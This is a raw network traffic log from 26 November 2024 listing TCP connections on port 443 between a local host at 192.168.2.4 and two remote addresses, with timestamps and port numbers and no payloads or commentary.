Nov 26, 2024 09:04:49.860372066 CET	49837	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:49.860434055 CET	443	49837	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:49.860773087 CET	49837	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:50.070966959 CET	443	49839	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:50.071049929 CET	49839	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:50.071947098 CET	49839	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:50.071962118 CET	443	49839	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:50.072099924 CET	49839	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:50.072146893 CET	443	49839	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:50.072206974 CET	49839	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:52.093208075 CET	49848	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:04:52.093261957 CET	443	49848	20.233.83.145	192.168.2.4
Nov 26, 2024 09:04:52.093401909 CET	49848	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:04:52.093993902 CET	49848	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:04:52.094008923 CET	443	49848	20.233.83.145	192.168.2.4
Nov 26, 2024 09:04:53.775924921 CET	443	49848	20.233.83.145	192.168.2.4
Nov 26, 2024 09:04:53.776032925 CET	49848	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:04:53.777357101 CET	49848	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:04:53.777364969 CET	443	49848	20.233.83.145	192.168.2.4
Nov 26, 2024 09:04:53.777460098 CET	49848	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:04:53.777697086 CET	443	49848	20.233.83.145	192.168.2.4
Nov 26, 2024 09:04:53.777748108 CET	49848	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:04:54.811748028 CET	49854	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:54.811785936 CET	443	49854	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:54.811892033 CET	49854	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:54.812500000 CET	49854	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:54.812511921 CET	443	49854	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:54.874156952 CET	49855	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:54.874207973 CET	443	49855	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:54.874275923 CET	49855	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:54.875233889 CET	49855	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:54.875247955 CET	443	49855	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:55.118340015 CET	49856	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:55.118391037 CET	443	49856	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:55.118499041 CET	49856	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:55.119024038 CET	49856	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:55.119039059 CET	443	49856	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:56.065258980 CET	443	49854	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:56.065427065 CET	49854	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:56.066365957 CET	49854	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:56.066375971 CET	443	49854	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:56.066528082 CET	49854	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:56.066767931 CET	443	49854	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:56.066829920 CET	49854	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:56.128271103 CET	443	49855	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:56.128350019 CET	49855	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:56.129384041 CET	49855	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:56.129391909 CET	443	49855	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:56.129513979 CET	49855	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:56.129538059 CET	443	49855	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:56.129586935 CET	49855	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:56.417907953 CET	443	49856	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:56.418000937 CET	49856	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:56.419262886 CET	49856	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:56.419270039 CET	443	49856	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:56.419379950 CET	49856	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:56.419446945 CET	443	49856	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:56.419492960 CET	49856	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:58.780673981 CET	49867	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:04:58.780734062 CET	443	49867	20.233.83.145	192.168.2.4
Nov 26, 2024 09:04:58.780823946 CET	49867	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:04:58.781413078 CET	49867	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:04:58.781428099 CET	443	49867	20.233.83.145	192.168.2.4
Nov 26, 2024 09:05:00.453804016 CET	443	49867	20.233.83.145	192.168.2.4
Nov 26, 2024 09:05:00.454032898 CET	49867	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:05:00.454890966 CET	49867	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:05:00.454904079 CET	443	49867	20.233.83.145	192.168.2.4
Nov 26, 2024 09:05:00.455018044 CET	49867	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:05:00.455080986 CET	443	49867	20.233.83.145	192.168.2.4
Nov 26, 2024 09:05:00.455128908 CET	49867	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:05:01.061692953 CET	49873	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:01.061737061 CET	443	49873	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:01.061830997 CET	49873	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:01.062329054 CET	49873	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:01.062339067 CET	443	49873	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:01.139874935 CET	49874	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:01.139915943 CET	443	49874	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:01.140031099 CET	49874	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:01.140640020 CET	49874	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:01.140652895 CET	443	49874	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:01.421139002 CET	49875	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:01.421190977 CET	443	49875	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:01.421273947 CET	49875	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:01.422086000 CET	49875	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:01.422101974 CET	443	49875	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:02.315372944 CET	443	49873	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:02.315543890 CET	49873	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:02.316560984 CET	49873	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:02.316569090 CET	443	49873	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:02.316663980 CET	49873	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:02.316729069 CET	443	49873	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:02.317028999 CET	49873	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:02.722337961 CET	443	49874	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:02.722476959 CET	49874	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:02.723870039 CET	49874	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:02.723880053 CET	443	49874	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:02.724050999 CET	49874	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:02.724083900 CET	443	49874	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:02.724185944 CET	49874	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:03.002516985 CET	443	49875	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:03.002669096 CET	49875	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:03.004040003 CET	49875	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:03.004045963 CET	443	49875	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:03.004173040 CET	49875	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:03.004239082 CET	443	49875	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:03.004290104 CET	49875	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:05.452493906 CET	49886	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:05:05.452548027 CET	443	49886	20.233.83.145	192.168.2.4
Nov 26, 2024 09:05:05.452764034 CET	49886	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:05:05.453440905 CET	49886	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:05:05.453460932 CET	443	49886	20.233.83.145	192.168.2.4
Nov 26, 2024 09:05:07.134319067 CET	443	49886	20.233.83.145	192.168.2.4
Nov 26, 2024 09:05:07.134433985 CET	49886	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:05:07.135449886 CET	49886	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:05:07.135459900 CET	443	49886	20.233.83.145	192.168.2.4
Nov 26, 2024 09:05:07.135550976 CET	49886	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:05:07.135622025 CET	443	49886	20.233.83.145	192.168.2.4
Nov 26, 2024 09:05:07.135677099 CET	49886	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:05:07.327938080 CET	49891	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:07.327981949 CET	443	49891	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:07.328052998 CET	49891	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:07.328649998 CET	49891	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:07.328661919 CET	443	49891	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:07.733764887 CET	49893	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:07.733828068 CET	443	49893	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:07.733913898 CET	49893	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:07.734468937 CET	49893	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:07.734487057 CET	443	49893	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:08.014854908 CET	49894	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:08.014897108 CET	443	49894	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:08.014981985 CET	49894	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:08.015480995 CET	49894	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:08.015494108 CET	443	49894	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:08.853529930 CET	443	49891	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:08.853621960 CET	49891	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:08.854566097 CET	49891	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:08.854573965 CET	443	49891	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:08.854670048 CET	49891	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:08.854742050 CET	443	49891	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:08.854782104 CET	49891	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:09.257992983 CET	443	49893	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:09.258128881 CET	49893	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:09.259121895 CET	49893	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:09.259130001 CET	443	49893	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:09.259258986 CET	49893	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:09.259322882 CET	443	49893	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:09.259368896 CET	49893	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:09.653487921 CET	443	49894	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:09.653729916 CET	49894	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:09.654932022 CET	49894	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:09.654932022 CET	49894	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:09.654949903 CET	443	49894	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:09.655148029 CET	443	49894	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:09.655364990 CET	49894	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:12.270392895 CET	49904	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:05:12.270437956 CET	443	49904	20.233.83.145	192.168.2.4
Nov 26, 2024 09:05:12.270628929 CET	49904	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:05:12.271083117 CET	49904	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:05:12.271097898 CET	443	49904	20.233.83.145	192.168.2.4
Nov 26, 2024 09:05:13.858908892 CET	49908	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:13.858958960 CET	443	49908	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:13.859107971 CET	49908	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:13.859762907 CET	49908	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:13.859777927 CET	443	49908	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:13.900536060 CET	443	49904	20.233.83.145	192.168.2.4
Nov 26, 2024 09:05:13.900619984 CET	49904	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:05:13.901758909 CET	49904	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:05:13.901774883 CET	443	49904	20.233.83.145	192.168.2.4
Nov 26, 2024 09:05:13.901890039 CET	49904	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:05:13.901942015 CET	443	49904	20.233.83.145	192.168.2.4
Nov 26, 2024 09:05:13.902033091 CET	49904	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:05:14.265022039 CET	49911	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:14.265131950 CET	443	49911	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:14.265219927 CET	49911	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:14.266401052 CET	49911	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:14.266431093 CET	443	49911	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:14.656017065 CET	49912	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:14.656060934 CET	443	49912	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:14.656164885 CET	49912	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:14.665750980 CET	49912	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:14.665766954 CET	443	49912	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:15.444674015 CET	443	49908	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:15.444905043 CET	49908	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:15.446079016 CET	49908	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:15.446089983 CET	443	49908	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:15.446229935 CET	49908	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:15.446268082 CET	443	49908	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:15.446324110 CET	49908	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:15.519948959 CET	443	49911	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:15.520076036 CET	49911	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:15.521029949 CET	49911	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:15.521058083 CET	443	49911	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:15.521236897 CET	49911	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:15.521322966 CET	443	49911	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:15.522483110 CET	49911	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:16.248079062 CET	443	49912	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:16.248372078 CET	49912	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:16.249684095 CET	49912	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:16.249684095 CET	49912	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:16.249692917 CET	443	49912	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:16.249877930 CET	443	49912	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:16.249937057 CET	49912	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:18.890145063 CET	49923	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:05:18.890189886 CET	443	49923	20.233.83.145	192.168.2.4
Nov 26, 2024 09:05:18.890289068 CET	49923	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:05:18.891035080 CET	49923	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:05:18.891046047 CET	443	49923	20.233.83.145	192.168.2.4
Nov 26, 2024 09:05:20.452579975 CET	49927	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:20.452641964 CET	443	49927	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:20.452699900 CET	49927	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:20.453923941 CET	49927	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:20.453943014 CET	443	49927	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:20.486047983 CET	443	49923	20.233.83.145	192.168.2.4
Nov 26, 2024 09:05:20.486174107 CET	49923	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:05:20.487854958 CET	49923	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:05:20.487869978 CET	443	49923	20.233.83.145	192.168.2.4
Nov 26, 2024 09:05:20.487988949 CET	49923	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:05:20.488050938 CET	443	49923	20.233.83.145	192.168.2.4
Nov 26, 2024 09:05:20.488177061 CET	49923	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:05:20.530612946 CET	49928	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:20.530670881 CET	443	49928	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:20.530786991 CET	49928	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:20.531389952 CET	49928	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:20.531405926 CET	443	49928	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:21.265357018 CET	49931	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:21.265394926 CET	443	49931	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:21.265471935 CET	49931	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:21.266063929 CET	49931	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:21.266074896 CET	443	49931	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:21.661555052 CET	443	49927	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:21.661634922 CET	49927	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:21.662988901 CET	49927	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:21.663002014 CET	443	49927	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:21.663099051 CET	49927	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:21.663122892 CET	443	49927	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:21.663167000 CET	49927	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:21.830302954 CET	443	49928	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:21.830425978 CET	49928	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:21.831458092 CET	49928	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:21.831466913 CET	443	49928	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:21.831585884 CET	443	49928	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:21.831609964 CET	49928	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:21.831619978 CET	443	49928	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:21.831697941 CET	49928	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:22.901242971 CET	443	49931	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:22.901503086 CET	49931	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:22.902339935 CET	49931	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:22.902350903 CET	443	49931	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:22.902513027 CET	49931	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:22.902549982 CET	443	49931	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:22.902659893 CET	49931	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:25.499463081 CET	49942	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:05:25.499521017 CET	443	49942	20.233.83.145	192.168.2.4
Nov 26, 2024 09:05:25.499597073 CET	49942	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:05:25.500152111 CET	49942	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:05:25.500174046 CET	443	49942	20.233.83.145	192.168.2.4
Nov 26, 2024 09:05:26.671493053 CET	49944	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:26.671516895 CET	443	49944	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:26.671648026 CET	49944	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:26.672135115 CET	49944	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:26.672147036 CET	443	49944	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:26.843174934 CET	49946	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:26.843189001 CET	443	49946	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:26.843849897 CET	49946	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:26.843966007 CET	49946	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:26.843980074 CET	443	49946	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:27.132694006 CET	443	49942	20.233.83.145	192.168.2.4
Nov 26, 2024 09:05:27.132780075 CET	49942	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:05:27.133743048 CET	49942	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:05:27.133748055 CET	443	49942	20.233.83.145	192.168.2.4
Nov 26, 2024 09:05:27.133831978 CET	49942	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:05:27.133894920 CET	443	49942	20.233.83.145	192.168.2.4
Nov 26, 2024 09:05:27.133941889 CET	49942	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:05:27.905479908 CET	49950	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:27.905524969 CET	443	49950	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:27.905589104 CET	49950	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:27.906090975 CET	49950	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:27.906102896 CET	443	49950	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:28.050697088 CET	443	49946	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:28.051032066 CET	49946	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:28.054960012 CET	49946	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:28.054968119 CET	443	49946	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:28.055059910 CET	49946	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:28.055105925 CET	443	49946	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:28.055172920 CET	49946	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:28.311599970 CET	443	49944	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:28.311733007 CET	49944	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:28.312854052 CET	49944	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:28.312881947 CET	443	49944	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:28.312952042 CET	49944	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:28.313100100 CET	443	49944	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:28.313158989 CET	49944	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:29.159080982 CET	443	49950	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:29.159188986 CET	49950	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:29.160213947 CET	49950	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:29.160224915 CET	443	49950	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:29.160355091 CET	49950	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:29.160376072 CET	443	49950	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:29.160439014 CET	49950	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:32.139949083 CET	49961	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:05:32.139996052 CET	443	49961	20.233.83.145	192.168.2.4
Nov 26, 2024 09:05:32.140098095 CET	49961	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:05:32.140666962 CET	49961	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:05:32.140680075 CET	443	49961	20.233.83.145	192.168.2.4
Nov 26, 2024 09:05:33.046166897 CET	49963	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:33.046200991 CET	443	49963	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:33.046299934 CET	49963	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:33.046994925 CET	49963	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:33.047012091 CET	443	49963	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:33.311789989 CET	49964	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:33.311847925 CET	443	49964	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:33.312096119 CET	49964	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:33.312674046 CET	49964	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:33.312691927 CET	443	49964	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:33.831783056 CET	443	49961	20.233.83.145	192.168.2.4
Nov 26, 2024 09:05:33.831965923 CET	49961	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:05:33.832873106 CET	49961	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:05:33.832885027 CET	443	49961	20.233.83.145	192.168.2.4
Nov 26, 2024 09:05:33.833015919 CET	49961	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:05:33.833266020 CET	443	49961	20.233.83.145	192.168.2.4
Nov 26, 2024 09:05:33.833360910 CET	49961	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:05:34.155504942 CET	49968	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:34.155558109 CET	443	49968	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:34.155622959 CET	49968	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:34.156291962 CET	49968	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:34.156313896 CET	443	49968	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:34.346031904 CET	443	49963	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:34.346128941 CET	49963	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:34.347220898 CET	49963	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:34.347239971 CET	443	49963	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:34.347322941 CET	49963	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:34.347413063 CET	443	49963	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:34.347453117 CET	49963	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:34.893701077 CET	443	49964	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:34.893906116 CET	49964	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:34.895087004 CET	49964	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:34.895097971 CET	443	49964	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:34.895211935 CET	49964	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:34.895283937 CET	443	49964	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:34.895339966 CET	49964	443	192.168.2.4	199.232.192.209
